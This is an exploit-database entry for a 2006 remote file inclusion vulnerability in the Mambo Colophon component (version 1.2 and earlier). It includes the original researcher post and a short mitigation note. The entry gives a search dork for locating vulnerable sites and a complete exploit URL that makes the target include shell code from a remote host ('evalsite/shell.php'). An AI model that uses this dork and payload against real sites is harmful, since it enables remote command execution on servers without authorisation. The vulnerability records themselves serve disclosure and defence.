header-logo
Suggest Exploit
vendor:
Mambo
by:
Drago84
7,5
CVSS
HIGH
Remote File Inclusion (RFI)
98
CWE
Product Name: Mambo
Affected Version From: 1.2
Affected Version To: 1.2
Patch Exists: YES
Related CWE: N/A
CPE: a:mambo:mambo
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

Command Mambo Colophon <=1.2

This bug allows a remote attacker to execute commands via Remote File Inclusion (RFI). The vulnerable page is admin.colophon.php, which contains a require_once statement that can be exploited by adding a malicious URL in the mosConfig_absolute_path parameter. The dork for this vulnerability is inurl:com_colophon and the exploit URL is http:/www.site.it/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://evalsite/shell.php?

Mitigation:

Add a whitelist of allowed URLs to the require_once statement, and ensure that the mosConfig_absolute_path parameter is properly validated.
Source

Exploit-DB raw data:

###########  Command Mambo Colophon =<1.2 ##by #Drago84#########

      Found By Drago84
Exclusive Security Italian Security

  This bug allows a remote atacker to execute commands via rfi

page:
  admin.colophon.php

bug:
 require_once("$mosConfig_absolute_path/components/com_colophon/language/$mosConfig_lang.php");

path:
add in admin.colophon.php
defined( '_VALID_MOS' ) or die( 'hacking attemp.' );

dork: inurl:com_colophon

expl:
htttp:/www.site.it/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://evalsite/shell.php?

# milw0rm.com [2006-07-29]

Navigation

Suggest Exploit

Services By CQR